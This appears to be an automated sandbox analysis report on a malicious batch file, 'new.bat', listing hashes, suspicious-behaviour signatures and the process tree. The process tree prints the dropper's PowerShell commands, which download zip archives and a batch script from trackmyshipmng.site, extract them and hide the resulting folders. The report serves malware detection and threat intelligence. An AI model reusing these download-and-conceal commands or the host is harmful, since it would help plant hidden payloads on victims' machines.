Analysis
-
max time kernel
1442s -
max time network
1448s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
15-08-2024 18:38
Static task
static1
Behavioral task
behavioral1
Sample
new.bat
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
new.bat
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
new.bat
Resource
win10v2004-20240802-en
General
-
Target
new.bat
-
Size
18.0MB
-
MD5
35168f928a81982fc428113f484ea21e
-
SHA1
2029d685911c351cea2857e12c1755df330e4978
-
SHA256
496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344
-
SHA512
4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec
-
SSDEEP
48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr
Malware Config
Signatures
-
pid Process 2556 powershell.exe 2456 powershell.exe 2720 powershell.exe 2092 powershell.exe 2768 powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 764 timeout.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2556 powershell.exe 2092 powershell.exe 2456 powershell.exe 2720 powershell.exe 2768 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 2456 powershell.exe Token: SeDebugPrivilege 2720 powershell.exe Token: SeDebugPrivilege 2768 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 3012 wrote to memory of 2556 3012 cmd.exe 30 PID 3012 wrote to memory of 2556 3012 cmd.exe 30 PID 3012 wrote to memory of 2556 3012 cmd.exe 30 PID 3012 wrote to memory of 2092 3012 cmd.exe 31 PID 3012 wrote to memory of 2092 3012 cmd.exe 31 PID 3012 wrote to memory of 2092 3012 cmd.exe 31 PID 3012 wrote to memory of 764 3012 cmd.exe 32 PID 3012 wrote to memory of 764 3012 cmd.exe 32 PID 3012 wrote to memory of 764 3012 cmd.exe 32 PID 3012 wrote to memory of 2748 3012 cmd.exe 33 PID 3012 wrote to memory of 2748 3012 cmd.exe 33 PID 3012 wrote to memory of 2748 3012 cmd.exe 33 PID 3012 wrote to memory of 2456 3012 cmd.exe 34 PID 3012 wrote to memory of 2456 3012 cmd.exe 34 PID 3012 wrote to memory of 2456 3012 cmd.exe 34 PID 3012 wrote to memory of 2720 3012 cmd.exe 35 PID 3012 wrote to memory of 2720 3012 cmd.exe 35 PID 3012 wrote to memory of 2720 3012 cmd.exe 35 PID 3012 wrote to memory of 2768 3012 cmd.exe 36 PID 3012 wrote to memory of 2768 3012 cmd.exe 36 PID 3012 wrote to memory of 2768 3012 cmd.exe 36 PID 3012 wrote to memory of 2664 3012 cmd.exe 37 PID 3012 wrote to memory of 2664 3012 cmd.exe 37 PID 3012 wrote to memory of 2664 3012 cmd.exe 37 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 2748 attrib.exe 2664 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\system32\timeout.exetimeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)2⤵
- Delays execution with timeout.exe
PID:764
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Python"2⤵
- Views/modifies file attributes
PID:2748
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2720
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\Downloads\Print"2⤵
- Views/modifies file attributes
PID:2664
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5ff88f630ed81df16ea23f5a7744f7364
SHA110e301bdbcbde767d8a527f44a152470b91f85ef
SHA256d91bfc496c55eb51ad8f57eeaade819e3039a59f5da98abe1c50133ff18e6095
SHA5126286f955c81b4a4f24c3247743db84fcfb7af47c5571163c1dd6f73d18155940010c7b4d92abe658cac15a30b48f5c28b937b5a34279fd91e3dbf56e5b3bdc63